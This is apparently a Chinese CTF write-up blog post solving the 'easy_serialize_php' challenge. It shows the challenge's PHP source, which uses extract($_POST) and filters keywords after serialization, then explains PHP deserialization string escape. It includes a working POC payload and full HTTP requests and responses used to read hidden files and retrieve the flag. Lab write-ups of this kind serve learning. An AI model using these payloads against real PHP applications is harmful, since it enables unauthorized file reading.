easy_serialize_php(反序列化逃逸)

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
} 
View Code

这题讲的是序列化的逃逸

 

之前做过一个题目也是逃逸的,做法是通过题目中把'where'替换成'hacker',让序列化后的字符串多一些字符

大概就是在这题的基础上,把这题改成function等于任意字符都可以序列化,然后replace("where","hacker",array()),"hacker"比where多一个字符,然后输入46个where就可以逃逸了

         

a:3:{s:4:"user";s:5:"guest";s:8:"function";s:46:"where(46个)";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

 

前面是写给我自己看的

 

下面是WP

POC:_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

在本地搭建环境POC 放在 extract()函数的后面  ,echo 序列化后的结果是

       

 

a:4{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:8:"";s:52:"";s:11:"";s:4:"aaaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}';

flagflag被替换成空的在 ‘:"show_image";’后面本该是 ‘ s:8:"flagflag"; ’ 的 变成了 ‘ s:8:""; ’ ,所以  ";s:52:" 被覆盖了,变成了字符串,下面我把它标红

a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:8:"";s:52:"";s:4:"aaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";

相当于

a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:8:"12345678";s:4:"aaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

而后面被标绿的就是被遗弃的部分

发包

POST /?f=show_image HTTP/1.1
Host: e2fa180d-b401-414d-b673-d537751616e6.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://9dd213f5-91a8-4b1c-8a4e-88cab48d2d67
Content-Length: 70
Connection: close

_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

返回

 

HTTP/1.1 200 OK
Server: openresty
Date: Wed, 25 Dec 2019 06:21:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 45
Connection: close

<?php

$flag = 'flag in /d0g3_fllllllag';

?>

base64(d0g3_fllllllag)=L2QwZzNfZmxsbGxsbGFn

发包

 

POST /?f=show_image HTTP/1.1
Host: e2fa180d-b401-414d-b673-d537751616e6.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://9dd213f5-91a8-4b1c-8a4e-88cab48d2d67
Content-Length: 70
Connection: close

_SESSION[fl1gfl1g]=";s:3:"aaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

 

反包

 

HTTP/1.1 200 OK
Server: openresty
Date: Wed, 25 Dec 2019 05:43:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 43
Connection: close

flag{86880642-c830-4268-a7ed-dd7c94a08514}

posted @ 2019-12-25 14:35  NBBack  阅读(770)  评论(0编辑  收藏  举报